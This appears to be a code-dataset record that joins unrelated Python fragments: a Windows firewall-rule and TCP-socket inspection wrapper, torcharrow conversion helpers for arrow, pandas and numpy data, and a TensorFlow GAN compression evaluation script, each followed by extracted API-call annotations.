return {prof: self.enabled_for_profile_type(prof) for prof in profiles}
def enabled_for_profile_type(self, profile_type):
enabled = gdef.VARIANT_BOOL()
self.get_FirewallEnabled(profile_type, enabled)
return enabled.value
class FirewallRule(cominterfaces.INetFwRule):
"""A rule of the firewall"""
@property
def name(self):
"""Name of the rule
:type: :class:`unicode`
"""
name = gdef.BSTR()
self.get_Name(name)
return name.value
@property
def description(self):
"""Description of the rule
:type: :class:`unicode`
"""
description = gdef.BSTR()
self.get_Description(description)
return description.value
@property
def application_name(self):
"""Name of the application to which apply the rule
:type: :class:`unicode`
"""
applicationname = gdef.BSTR()
self.get_ApplicationName(applicationname)
return applicationname.value
@property
def service_name(self):
"""Name of the service to which apply the rule
:type: :class:`unicode`
"""
servicename = gdef.BSTR()
self.get_ServiceName(servicename)
return servicename.value
@property
def protocol(self):
"""Protocol to which apply the rule
:type: :class:`long`
"""
protocol = gdef.LONG()
self.get_Protocol(protocol)
return protocol.value
@property
def local_address(self):
"""Local address of the rule
:type: :class:`unicode`
"""
local_address = gdef.BSTR()
self.get_LocalAddresses(local_address)
return local_address.value
@property
def remote_address(self):
"""Remote address of the rule
:type: :class:`unicode`
"""
remote_address = gdef.BSTR()
self.get_RemoteAddresses(remote_address)
return remote_address.value
@property
def direction(self):
"""Direction of the rule, values might be:
* ``NET_FW_RULE_DIRECTION_.NET_FW_RULE_DIR_IN(0x1L)``
* ``NET_FW_RULE_DIRECTION_.NET_FW_RULE_DIR_OUT(0x2L)``
subclass of :class:`long`
"""
direction = gdef.NET_FW_RULE_DIRECTION()
self.get_Direction(direction)
return direction.value
@property
def interface_types(self):
"""Types of interface of the rule
:type: :class:`unicode`
"""
interface_type = gdef.BSTR()
self.get_InterfaceTypes(interface_type)
return interface_type.value
@property
def local_port(self):
"""Local port of the rule
:type: :class:`unicode`
"""
local_port = gdef.BSTR()
self.get_LocalPorts(local_port)
return local_port.value
@property
def remote_port(self):
"""Remote port of the rule
:type: :class:`unicode`
"""
remote_port = gdef.BSTR()
self.get_RemotePorts(remote_port)
return remote_port.value
@property
def action(self):
"""Action of the rule, values might be:
* ``NET_FW_ACTION_.NET_FW_ACTION_BLOCK(0x0L)``
* ``NET_FW_ACTION_.NET_FW_ACTION_ALLOW(0x1L)``
subclass of :class:`long`
"""
action = gdef.NET_FW_ACTION()
self.get_Action(action)
return action.value
@property
def enabled(self):
"""``True`` if rule is enabled"""
enabled = gdef.VARIANT_BOOL()
self.get_Enabled(enabled)
return enabled.value
@property
def grouping(self):
"""Grouping of the rule
:type: :class:`unicode`
"""
grouping = gdef.BSTR()
self.get_RemotePorts(grouping)
return grouping.value
@property
def icmp_type_and_code(self):
icmp_type_and_code = gdef.BSTR()
self.get_RemotePorts(icmp_type_and_code)
return icmp_type_and_code.value
def __repr__(self):
return u'<{0} "{1}">'.format(type(self).__name__, self.name).encode("ascii", errors='backslashreplace')
class Network(object):
NetFwPolicy2 = windows.com.IID.from_string("E2B3C97F-6AE1-41AC-817A-F6F92166D7DD")
@property
def firewall(self):
"""The firewall of the system
:type: :class:`Firewall`
"""
windows.com.init()
firewall = Firewall()
windows.com.create_instance(self.NetFwPolicy2, firewall)
return firewall
@staticmethod
def _get_tcp_ipv4_sockets():
size = ctypes.c_uint(0)
try:
winproxy.GetExtendedTcpTable(None, ctypes.byref(size), ulAf=AF_INET)
except winproxy.IphlpapiError:
pass # Allow us to set size to the needed value
buffer = (ctypes.c_char * size.value)()
winproxy.GetExtendedTcpTable(buffer, ctypes.byref(size), ulAf=AF_INET)
t = get_MIB_TCPTABLE_OWNER_PID_from_buffer(buffer)
return list(t.table)
@staticmethod
def _get_tcp_ipv6_sockets():
size = ctypes.c_uint(0)
try:
winproxy.GetExtendedTcpTable(None, ctypes.byref(size), ulAf=AF_INET6)
except winproxy.IphlpapiError:
pass # Allow us to set size to the needed value
buffer = (ctypes.c_char * size.value)()
winproxy.GetExtendedTcpTable(buffer, ctypes.byref(size), ulAf=AF_INET6)
t = get_MIB_TCP6TABLE_OWNER_PID_from_buffer(buffer)
return list(t.table)
ipv4 = property(lambda self: self._get_tcp_ipv4_sockets())
"""List of TCP IPv4 socket (connection and listening)
:type: [:class:`TCP4Connection`]"""
ipv6 = property(lambda self: self._get_tcp_ipv6_sockets())
"""List of TCP IPv6 socket (connection and listening)
:type: [:class:`TCP6Connection`]
"""
| [
"windows.com.interfaces.IEnumVARIANT",
"windows.generated_def.ULONG",
"windows.generated_def.VARIANT_BOOL",
"windows.com.init",
"windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer",
"windows.generated_def.LONG",
"windows.com.interfaces.IUnknown",
"windows.com.create_instance",
"ctypes.c_uint",
"windows.com.ImprovedVariant",
"windows.com.IID.from_string",
"windows.generated_def.NET_FW_ACTION",
"windows.generated_def.BSTR",
"struct.pack",
"socket.gethostbyaddr",
"socket.ntohs",
"windows.generated_def.NET_FW_RULE_DIRECTION",
"windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer",
"ctypes.byref",
"socket.getservbyport",
"windows.com.interfaces.INetFwRules"
] | [((4444, 4519), 'windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer', 'windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer', (['buffer'], {}), '(buffer)\n', (4511, 4519), False, 'import windows\n'), ((4877, 4953), 'windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer', 'windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer', (['buffer'], {}), '(buffer)\n', (4945, 4953), False, 'import windows\n'), ((11219, 11286), 'windows.com.IID.from_string', 'windows.com.IID.from_string', (['"""E2B3C97F-6AE1-41AC-817A-F6F92166D7DD"""'], {}), "('E2B3C97F-6AE1-41AC-817A-F6F92166D7DD')\n", (11246, 11286), False, 'import windows\n'), ((682, 713), 'socket.ntohs', 'socket.ntohs', (['self.dwRemotePort'], {}), '(self.dwRemotePort)\n', (694, 713), False, 'import socket\n'), ((804, 834), 'socket.ntohs', 'socket.ntohs', (['self.dwLocalPort'], {}), '(self.dwLocalPort)\n', (816, 834), False, 'import socket\n'), ((3211, 3242), 'socket.ntohs', 'socket.ntohs', (['self.dwRemotePort'], {}), '(self.dwRemotePort)\n', (3223, 3242), False, 'import socket\n'), ((3333, 3363), 'socket.ntohs', 'socket.ntohs', (['self.dwLocalPort'], {}), '(self.dwLocalPort)\n', (3345, 3363), False, 'import socket\n'), ((5532, 5559), 'windows.com.interfaces.INetFwRules', 'cominterfaces.INetFwRules', ([], {}), '()\n', (5557, 5559), True, 'from windows.com import interfaces as cominterfaces\n'), ((5614, 5625), 'windows.generated_def.LONG', 'gdef.LONG', ([], {}), '()\n', (5623, 5625), True, 'import windows.generated_def as gdef\n'), ((5681, 5705), 'windows.com.interfaces.IUnknown', 'cominterfaces.IUnknown', ([], {}), '()\n', (5703, 5705), True, 'from windows.com import interfaces as cominterfaces\n'), ((5764, 5792), 'windows.com.interfaces.IEnumVARIANT', 'cominterfaces.IEnumVARIANT', ([], {}), '()\n', (5790, 5792), True, 'from windows.com import interfaces as cominterfaces\n'), ((5863, 5875), 'windows.generated_def.ULONG', 'gdef.ULONG', ([], {}), '()\n', (5873, 5875), True, 'import windows.generated_def as gdef\n'), ((5890, 5919), 'windows.com.ImprovedVariant', 'windows.com.ImprovedVariant', ([], {}), '()\n', (5917, 5919), False, 'import windows\n'), ((6403, 6414), 'windows.generated_def.LONG', 'gdef.LONG', ([], {}), '()\n', (6412, 6414), True, 'import windows.generated_def as gdef\n'), ((7164, 7183), 'windows.generated_def.VARIANT_BOOL', 'gdef.VARIANT_BOOL', ([], {}), '()\n', (7181, 7183), True, 'import windows.generated_def as gdef\n'), ((7473, 7484), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (7482, 7484), True, 'import windows.generated_def as gdef\n'), ((7683, 7694), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (7692, 7694), True, 'import windows.generated_def as gdef\n'), ((7947, 7958), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (7956, 7958), True, 'import windows.generated_def as gdef\n'), ((8211, 8222), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (8220, 8222), True, 'import windows.generated_def as gdef\n'), ((8442, 8453), 'windows.generated_def.LONG', 'gdef.LONG', ([], {}), '()\n', (8451, 8453), True, 'import windows.generated_def as gdef\n'), ((8670, 8681), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (8679, 8681), True, 'import windows.generated_def as gdef\n'), ((8917, 8928), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (8926, 8928), True, 'import windows.generated_def as gdef\n'), ((9306, 9334), 'windows.generated_def.NET_FW_RULE_DIRECTION', 'gdef.NET_FW_RULE_DIRECTION', ([], {}), '()\n', (9332, 9334), True, 'import windows.generated_def as gdef\n'), ((9562, 9573), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (9571, 9573), True, 'import windows.generated_def as gdef\n'), ((9799, 9810), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (9808, 9810), True, 'import windows.generated_def as gdef\n'), ((10027, 10038), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (10036, 10038), True, 'import windows.generated_def as gdef\n'), ((10382, 10402), 'windows.generated_def.NET_FW_ACTION', 'gdef.NET_FW_ACTION', ([], {}), '()\n', (10400, 10402), True, 'import windows.generated_def as gdef\n'), ((10561, 10580), 'windows.generated_def.VARIANT_BOOL', 'gdef.VARIANT_BOOL', ([], {}), '()\n', (10578, 10580), True, 'import windows.generated_def as gdef\n'), ((10779, 10790), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (10788, 10790), True, 'import windows.generated_def as gdef\n'), ((10938, 10949), 'windows.generated_def.BSTR', 'gdef.BSTR', ([], {}), '()\n', (10947, 10949), True, 'import windows.generated_def as gdef\n'), ((11418, 11436), 'windows.com.init', 'windows.com.init', ([], {}), '()\n', (11434, 11436), False, 'import windows\n'), ((11475, 11531), 'windows.com.create_instance', 'windows.com.create_instance', (['self.NetFwPolicy2', 'firewall'], {}), '(self.NetFwPolicy2, firewall)\n', (11502, 11531), False, 'import windows\n'), ((11623, 11639), 'ctypes.c_uint', 'ctypes.c_uint', (['(0)'], {}), '(0)\n', (11636, 11639), False, 'import ctypes\n'), ((12116, 12132), 'ctypes.c_uint', 'ctypes.c_uint', (['(0)'], {}), '(0)\n', (12129, 12132), False, 'import ctypes\n'), ((978, 1013), 'struct.pack', 'struct.pack', (['"""<I"""', 'self.dwLocalAddr'], {}), "('<I', self.dwLocalAddr)\n", (989, 1013), False, 'import struct\n'), ((1217, 1253), 'struct.pack', 'struct.pack', (['"""<I"""', 'self.dwRemoteAddr'], {}), "('<I', self.dwRemoteAddr)\n", (1228, 1253), False, 'import struct\n'), ((1537, 1582), 'socket.getservbyport', 'socket.getservbyport', (['self.remote_port', '"""tcp"""'], {}), "(self.remote_port, 'tcp')\n", (1557, 1582), False, 'import socket\n'), ((1891, 1929), 'socket.gethostbyaddr', 'socket.gethostbyaddr', (['self.remote_addr'], {}), '(self.remote_addr)\n', (1911, 1929), False, 'import socket\n'), ((2389, 2410), 'ctypes.byref', 'ctypes.byref', (['closing'], {}), '(closing)\n', (2401, 2410), False, 'import ctypes\n'), ((11927, 11945), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (11939, 11945), False, 'import ctypes\n'), ((12421, 12439), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (12433, 12439), False, 'import ctypes\n'), ((11700, 11718), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (11712, 11718), False, 'import ctypes\n'), ((12193, 12211), 'ctypes.byref', 'ctypes.byref', (['size'], {}), '(size)\n', (12205, 12211), False, 'import ctypes\n')] |
# Copyright (c) Facebook, Inc. and its affiliates.
from typing import List, Optional, cast
# Skipping analyzing 'numpy': found module but no type hints or library stubs
import numpy as np # type: ignore
import numpy.ma as ma # type: ignore
# Skipping analyzing 'pandas': found module but no type hints or library stubs
import pandas as pd # type: ignore
import pyarrow as pa # type: ignore
import torcharrow.dtypes as dt
from torcharrow import Scope
def from_arrow_table(
table,
dtype: Optional[dt.DType] = None,
columns: Optional[List[str]] = None,
scope=None,
device="",
):
""" "
Convert arrow table to a torcharrow dataframe.
"""
scope = scope or Scope.default
device = device or scope.device
assert isinstance(table, pa.Table)
if dtype is not None:
assert dt.is_struct(dtype)
dtype = cast(dt.Struct, dtype)
res = {}
for f in dtype.fields:
chunked_array = table.column(f.name)
pydata = chunked_array.to_pylist()
res[f.name] = scope.Column(pydata, f.dtype)
return scope.DataFrame(res, device=device)
else:
res = {}
table = table.select(columns) if columns is not None else table
for n in table.column_names:
chunked_array = table.column(n)
pydata = chunked_array.to_pylist()
res[n] = scope.Column(
pydata,
dtype=_arrowtype_to_dtype(
table.schema.field(n).type, table.column(n).null_count > 0
),
)
return scope.DataFrame(res, device=device)
def from_pandas_dataframe(
df,
dtype: Optional[dt.DType] = None,
columns: Optional[List[str]] = None,
scope=None,
device="",
):
"""
Convert pandas dataframe to torcharrow dataframe (drops indices).
Parameters
----------
df : Pandas dataframe
dtype : dtype, default None
Data type to force, if None will automatically infer.
columns : array-like
List of column names to extract from df.
scope : Scope or None
Scope to use, or None for default scope.
device : str or ""
Device to use, or default if blank.
Examples
--------
>>> import pandas as pd
>>> import torcharrow as ta
>>> pdf = pd.DataFrame({'a': [0, 1, 2, 3],'b': [0.1, 0.2, None, 0.3]})
>>> gdf = ta.from_pandas_dataframe(pdf)
>>> gdf
index a b
------- --- ---
0 0 0.1
1 1 0.2
2 2
3 3 0.3
dtype: Struct([Field('a', int64), Field('b', Float64(nullable=True))]), count: 4, null_count: 0
"""
scope = scope or Scope.default
device = device or scope.device
if dtype is not None:
assert dt.is_struct(dtype)
dtype = cast(dt.Struct, dtype)
res = {}
for f in dtype.fields:
# this shows that Column shoud also construct Dataframes!
res[f.name] = from_pandas_series(
pd.Series(df[f.name]), f.dtype, scope=scope
)
return scope.Frame(res, dtype=dtype, device=device)
else:
res = {}
for n in df.columns:
if columns is None or n in columns:
res[n] = from_pandas_series(pd.Series(df[n]), scope=scope)
return scope.Frame(res, device=device)
def from_arrow_array(array, dtype=None, scope=None, device=""):
""" "
Convert arrow array to a torcharrow column.
"""
scope = scope or Scope.default
device = device or scope.device
assert isinstance(array, pa.Array)
pydata = _arrow_scalar_to_py(array)
if dtype is not None:
assert not dt.is_struct(dtype)
return scope.Column(pydata, dtype, device=device)
else:
return scope.Column(
pydata,
dtype=_arrowtype_to_dtype(array.type, array.null_count > 0),
device=device,
)
def from_pandas_series(series, dtype=None, scope=None, device=""):
""" "
Convert pandas series array to a torcharrow column (drops indices).
"""
scope = scope or Scope.default
device = device or scope.device
return from_numpy(series.to_numpy(), dtype, scope, device)
def from_numpy(array, dtype, scope=None, device=""):
"""
Convert 1dim numpy array to a torcharrow column (zero copy).
"""
scope = scope or Scope.default
device = device or scope.device
if isinstance(array, ma.core.MaskedArray) and array.ndim == 1:
return _from_numpy_ma(array.data, array.mask, dtype, scope, device)
elif isinstance(array, np.ndarray) and array.ndim == 1:
return _from_numpy_nd(array, dtype, scope, device)
else:
raise TypeError(f"cannot convert numpy array of type {array.dtype}")
def _is_not_str(s):
return not isinstance(s, str)
def _from_numpy_ma(data, mask, dtype, scope=None, device=""):
# adopt types
if dtype is None:
dtype = dt.typeof_np_dtype(data.dtype).with_null()
else:
assert dt.is_primitive_type(dtype)
assert dtype == dt.typeof_np_dtype(data.dtype).with_null()
# TODO if not, adopt the type or?
# Something like ma.array
# np.array([np.nan, np.nan, 3.]).astype(np.int64),
# mask = np.isnan([np.nan, np.nan, 3.]))
# create column, only zero copy supported
if dt.is_boolean_or_numerical(dtype):
assert not np.all(np.isnan(ma.array(data, mask).compressed()))
return scope._FullColumn(data, dtype=dtype, mask=mask)
elif dt.is_string(dtype) or dtype == "object":
assert np.all(np.vectorize(_is_not_str)(ma.array(data, mask).compressed()))
return scope._FullColumn(data, dtype=dtype, mask=mask)
else:
raise TypeError(f"cannot convert masked numpy array of type {data.dtype}")
def _from_numpy_nd(data, dtype, scope=None, device=""):
# adopt types
if dtype is None:
dtype = dt.typeof_np_dtype(data.dtype)
if dtype is None:
dtype = dt.string
else:
assert dt.is_primitive(dtype)
# TODO Check why teh following assert isn't the case
# assert dtype == dt.typeof_np_dtype(data.dtype)
# create column, only zero copy supported
if dt.is_boolean_or_numerical(dtype):
mask = np.isnan(data)
return scope._FullColumn(data, dtype=dtype, mask=mask)
elif dt.is_string(dtype):
mask = np.vectorize(_is_not_str)(data)
if np.any(mask):
dtype = dtype.with_null()
return scope._FullColumn(data, dtype=dtype, mask=mask)
else:
raise TypeError("can not convert numpy array of type {data.dtype,}")
# def _column_without_nan(series, dtype):
# if dtype is None or is_floating(dtype):
# for i in series:
# if isinstance(i, float) and np.isnan(i):
# yield None
# else:
# yield i
# else:
# for i in series:
# yield i
def _arrow_scalar_to_py(array):
for i in array:
yield i.as_py()
def _pandatype_to_dtype(t, nullable):
return dt.typeof_nptype(t, nullable)
def _arrowtype_to_dtype(t, nullable):
if pa.types.is_boolean(t):
return dt.Boolean(nullable)
if pa.types.is_int8(t):
return dt.Int8(nullable)
if pa.types.is_int16(t):
return dt.Int16(nullable)
if pa.types.is_int32(t):
return dt.Int32(nullable)
if pa.types.is_int64(t):
return dt.Int64(nullable)
if pa.types.is_float32(t):
return dt.Float32(nullable)
if pa.types.is_float64(t):
return dt.Float64(nullable)
if pa.types.is_list(t):
return List(t.value_type, nullable)
if pa.types.is_struct(t):
return _pandatype_to_dtype(t.to_pandas_dtype(), True)
if pa.types.is_null(t):
return dt.Void()
if pa.types.is_string(t):
return dt.String(nullable)
if pa.types.is_map(t):
return dt.Map(t.item_type, t.key_type, nullable)
raise NotImplementedError("unsupported case")
| [
"torcharrow.dtypes.is_string",
"pyarrow.types.is_float32",
"torcharrow.dtypes.Map",
"torcharrow.dtypes.Int8",
"torcharrow.dtypes.is_boolean_or_numerical",
"torcharrow.dtypes.String",
"pyarrow.types.is_float64",
"pyarrow.types.is_map",
"torcharrow.dtypes.is_struct",
"pyarrow.types.is_boolean",
"pyarrow.types.is_struct",
"torcharrow.dtypes.typeof_nptype",
"pyarrow.types.is_string",
"torcharrow.dtypes.Int32",
"torcharrow.dtypes.is_primitive_type",
"torcharrow.dtypes.Int16",
"torcharrow.dtypes.typeof_np_dtype",
"numpy.ma.array",
"pyarrow.types.is_int8",
"pyarrow.types.is_int64",
"torcharrow.dtypes.Boolean",
"pyarrow.types.is_list",
"numpy.any",
"numpy.isnan",
"pyarrow.types.is_null",
"torcharrow.dtypes.Float64",
"pyarrow.types.is_int16",
"torcharrow.dtypes.Void",
"numpy.vectorize",
"typing.cast",
"pandas.Series",
"torcharrow.dtypes.Int64",
"typing.List",
"torcharrow.dtypes.Float32",
"pyarrow.types.is_int32",
"torcharrow.dtypes.is_primitive"
] | [((5363, 5396), 'torcharrow.dtypes.is_boolean_or_numerical', 'dt.is_boolean_or_numerical', (['dtype'], {}), '(dtype)\n', (5389, 5396), True, 'import torcharrow.dtypes as dt\n'), ((6246, 6279), 'torcharrow.dtypes.is_boolean_or_numerical', 'dt.is_boolean_or_numerical', (['dtype'], {}), '(dtype)\n', (6272, 6279), True, 'import torcharrow.dtypes as dt\n'), ((7101, 7130), 'torcharrow.dtypes.typeof_nptype', 'dt.typeof_nptype', (['t', 'nullable'], {}), '(t, nullable)\n', (7117, 7130), True, 'import torcharrow.dtypes as dt\n'), ((7178, 7200), 'pyarrow.types.is_boolean', 'pa.types.is_boolean', (['t'], {}), '(t)\n', (7197, 7200), True, 'import pyarrow as pa\n'), ((7245, 7264), 'pyarrow.types.is_int8', 'pa.types.is_int8', (['t'], {}), '(t)\n', (7261, 7264), True, 'import pyarrow as pa\n'), ((7306, 7326), 'pyarrow.types.is_int16', 'pa.types.is_int16', (['t'], {}), '(t)\n', (7323, 7326), True, 'import pyarrow as pa\n'), ((7369, 7389), 'pyarrow.types.is_int32', 'pa.types.is_int32', (['t'], {}), '(t)\n', (7386, 7389), True, 'import pyarrow as pa\n'), ((7432, 7452), 'pyarrow.types.is_int64', 'pa.types.is_int64', (['t'], {}), '(t)\n', (7449, 7452), True, 'import pyarrow as pa\n'), ((7495, 7517), 'pyarrow.types.is_float32', 'pa.types.is_float32', (['t'], {}), '(t)\n', (7514, 7517), True, 'import pyarrow as pa\n'), ((7562, 7584), 'pyarrow.types.is_float64', 'pa.types.is_float64', (['t'], {}), '(t)\n', (7581, 7584), True, 'import pyarrow as pa\n'), ((7629, 7648), 'pyarrow.types.is_list', 'pa.types.is_list', (['t'], {}), '(t)\n', (7645, 7648), True, 'import pyarrow as pa\n'), ((7701, 7722), 'pyarrow.types.is_struct', 'pa.types.is_struct', (['t'], {}), '(t)\n', (7719, 7722), True, 'import pyarrow as pa\n'), ((7793, 7812), 'pyarrow.types.is_null', 'pa.types.is_null', (['t'], {}), '(t)\n', (7809, 7812), True, 'import pyarrow as pa\n'), ((7846, 7867), 'pyarrow.types.is_string', 'pa.types.is_string', (['t'], {}), '(t)\n', (7864, 7867), True, 'import pyarrow as pa\n'), ((7911, 7929), 'pyarrow.types.is_map', 'pa.types.is_map', (['t'], {}), '(t)\n', (7926, 7929), True, 'import pyarrow as pa\n'), ((824, 843), 'torcharrow.dtypes.is_struct', 'dt.is_struct', (['dtype'], {}), '(dtype)\n', (836, 843), True, 'import torcharrow.dtypes as dt\n'), ((860, 882), 'typing.cast', 'cast', (['dt.Struct', 'dtype'], {}), '(dt.Struct, dtype)\n', (864, 882), False, 'from typing import List, Optional, cast\n'), ((2776, 2795), 'torcharrow.dtypes.is_struct', 'dt.is_struct', (['dtype'], {}), '(dtype)\n', (2788, 2795), True, 'import torcharrow.dtypes as dt\n'), ((2812, 2834), 'typing.cast', 'cast', (['dt.Struct', 'dtype'], {}), '(dt.Struct, dtype)\n', (2816, 2834), False, 'from typing import List, Optional, cast\n'), ((5028, 5055), 'torcharrow.dtypes.is_primitive_type', 'dt.is_primitive_type', (['dtype'], {}), '(dtype)\n', (5048, 5055), True, 'import torcharrow.dtypes as dt\n'), ((5938, 5968), 'torcharrow.dtypes.typeof_np_dtype', 'dt.typeof_np_dtype', (['data.dtype'], {}), '(data.dtype)\n', (5956, 5968), True, 'import torcharrow.dtypes as dt\n'), ((6050, 6072), 'torcharrow.dtypes.is_primitive', 'dt.is_primitive', (['dtype'], {}), '(dtype)\n', (6065, 6072), True, 'import torcharrow.dtypes as dt\n'), ((6296, 6310), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (6304, 6310), True, 'import numpy as np\n'), ((6383, 6402), 'torcharrow.dtypes.is_string', 'dt.is_string', (['dtype'], {}), '(dtype)\n', (6395, 6402), True, 'import torcharrow.dtypes as dt\n'), ((7217, 7237), 'torcharrow.dtypes.Boolean', 'dt.Boolean', (['nullable'], {}), '(nullable)\n', (7227, 7237), True, 'import torcharrow.dtypes as dt\n'), ((7281, 7298), 'torcharrow.dtypes.Int8', 'dt.Int8', (['nullable'], {}), '(nullable)\n', (7288, 7298), True, 'import torcharrow.dtypes as dt\n'), ((7343, 7361), 'torcharrow.dtypes.Int16', 'dt.Int16', (['nullable'], {}), '(nullable)\n', (7351, 7361), True, 'import torcharrow.dtypes as dt\n'), ((7406, 7424), 'torcharrow.dtypes.Int32', 'dt.Int32', (['nullable'], {}), '(nullable)\n', (7414, 7424), True, 'import torcharrow.dtypes as dt\n'), ((7469, 7487), 'torcharrow.dtypes.Int64', 'dt.Int64', (['nullable'], {}), '(nullable)\n', (7477, 7487), True, 'import torcharrow.dtypes as dt\n'), ((7534, 7554), 'torcharrow.dtypes.Float32', 'dt.Float32', (['nullable'], {}), '(nullable)\n', (7544, 7554), True, 'import torcharrow.dtypes as dt\n'), ((7601, 7621), 'torcharrow.dtypes.Float64', 'dt.Float64', (['nullable'], {}), '(nullable)\n', (7611, 7621), True, 'import torcharrow.dtypes as dt\n'), ((7665, 7693), 'typing.List', 'List', (['t.value_type', 'nullable'], {}), '(t.value_type, nullable)\n', (7669, 7693), False, 'from typing import List, Optional, cast\n'), ((7829, 7838), 'torcharrow.dtypes.Void', 'dt.Void', ([], {}), '()\n', (7836, 7838), True, 'import torcharrow.dtypes as dt\n'), ((7884, 7903), 'torcharrow.dtypes.String', 'dt.String', (['nullable'], {}), '(nullable)\n', (7893, 7903), True, 'import torcharrow.dtypes as dt\n'), ((7946, 7987), 'torcharrow.dtypes.Map', 'dt.Map', (['t.item_type', 't.key_type', 'nullable'], {}), '(t.item_type, t.key_type, nullable)\n', (7952, 7987), True, 'import torcharrow.dtypes as dt\n'), ((3686, 3705), 'torcharrow.dtypes.is_struct', 'dt.is_struct', (['dtype'], {}), '(dtype)\n', (3698, 3705), True, 'import torcharrow.dtypes as dt\n'), ((5542, 5561), 'torcharrow.dtypes.is_string', 'dt.is_string', (['dtype'], {}), '(dtype)\n', (5554, 5561), True, 'import torcharrow.dtypes as dt\n'), ((6462, 6474), 'numpy.any', 'np.any', (['mask'], {}), '(mask)\n', (6468, 6474), True, 'import numpy as np\n'), ((3015, 3036), 'pandas.Series', 'pd.Series', (['df[f.name]'], {}), '(df[f.name])\n', (3024, 3036), True, 'import pandas as pd\n'), ((4960, 4990), 'torcharrow.dtypes.typeof_np_dtype', 'dt.typeof_np_dtype', (['data.dtype'], {}), '(data.dtype)\n', (4978, 4990), True, 'import torcharrow.dtypes as dt\n'), ((6419, 6444), 'numpy.vectorize', 'np.vectorize', (['_is_not_str'], {}), '(_is_not_str)\n', (6431, 6444), True, 'import numpy as np\n'), ((3281, 3297), 'pandas.Series', 'pd.Series', (['df[n]'], {}), '(df[n])\n', (3290, 3297), True, 'import pandas as pd\n'), ((5080, 5110), 'torcharrow.dtypes.typeof_np_dtype', 'dt.typeof_np_dtype', (['data.dtype'], {}), '(data.dtype)\n', (5098, 5110), True, 'import torcharrow.dtypes as dt\n'), ((5606, 5631), 'numpy.vectorize', 'np.vectorize', (['_is_not_str'], {}), '(_is_not_str)\n', (5618, 5631), True, 'import numpy as np\n'), ((5433, 5453), 'numpy.ma.array', 'ma.array', (['data', 'mask'], {}), '(data, mask)\n', (5441, 5453), True, 'import numpy.ma as ma\n'), ((5632, 5652), 'numpy.ma.array', 'ma.array', (['data', 'mask'], {}), '(data, mask)\n', (5640, 5652), True, 'import numpy.ma as ma\n')] |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Evaluates a TFGAN trained compression model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
import tensorflow as tf
from research.gan.image_compression import data_provider
from research.gan.image_compression import networks
from research.gan.image_compression import summaries
FLAGS = tf.app.flags.FLAGS
flags = tf.app.flags
flags.DEFINE_string('master', '', 'Name of the TensorFlow master to use.')
flags.DEFINE_string('checkpoint_dir', '/tmp/compression/',
'Directory where the model was written to.')
flags.DEFINE_string('eval_dir', '/tmp/compression/',
'Directory where the results are saved to.')
flags.DEFINE_integer('max_number_of_evaluations', None,
'Number of times to run evaluation. If `None`, run '
'forever.')
flags.DEFINE_string('dataset_dir', 'testdata', 'Location of data.')
# Compression-specific flags.
flags.DEFINE_integer('batch_size', 32, 'The number of images in each batch.')
flags.DEFINE_integer('patch_size', 32, 'The size of the patches to train on.')
flags.DEFINE_integer('bits_per_patch', 1230,
'The number of bits to produce per patch.')
flags.DEFINE_integer('model_depth', 64,
'Number of filters for compression model')
def main(_, run_eval_loop=True):
with tf.name_scope('inputs'):
images = data_provider.provide_data(
'validation', FLAGS.batch_size, dataset_dir=FLAGS.dataset_dir,
patch_size=FLAGS.patch_size)
# In order for variables to load, use the same variable scope as in the
# train job.
with tf.variable_scope('generator'):
reconstructions, _, prebinary = networks.compression_model(
images,
num_bits=FLAGS.bits_per_patch,
depth=FLAGS.model_depth,
is_training=False)
summaries.add_reconstruction_summaries(images, reconstructions, prebinary)
# Visualize losses.
pixel_loss_per_example = tf.reduce_mean(
tf.abs(images - reconstructions), axis=[1, 2, 3])
pixel_loss = tf.reduce_mean(pixel_loss_per_example)
tf.summary.histogram('pixel_l1_loss_hist', pixel_loss_per_example)
tf.summary.scalar('pixel_l1_loss', pixel_loss)
# Create ops to write images to disk.
uint8_images = data_provider.float_image_to_uint8(images)
uint8_reconstructions = data_provider.float_image_to_uint8(reconstructions)
uint8_reshaped = summaries.stack_images(uint8_images, uint8_reconstructions)
image_write_ops = tf.write_file(
'%s/%s' % (FLAGS.eval_dir, 'compression.png'),
tf.image.encode_png(uint8_reshaped[0]))
# For unit testing, use `run_eval_loop=False`.
if not run_eval_loop: return
tf.contrib.training.evaluate_repeatedly(
FLAGS.checkpoint_dir,
master=FLAGS.master,
hooks=[tf.contrib.training.SummaryAtEndHook(FLAGS.eval_dir),
tf.contrib.training.StopAfterNEvalsHook(1)],
eval_ops=image_write_ops,
max_number_of_evaluations=FLAGS.max_number_of_evaluations)
if __name__ == '__main__':
app.run(_)
| [
"research.gan.image_compression.networks.compression_model",
"tensorflow.contrib.training.StopAfterNEvalsHook",
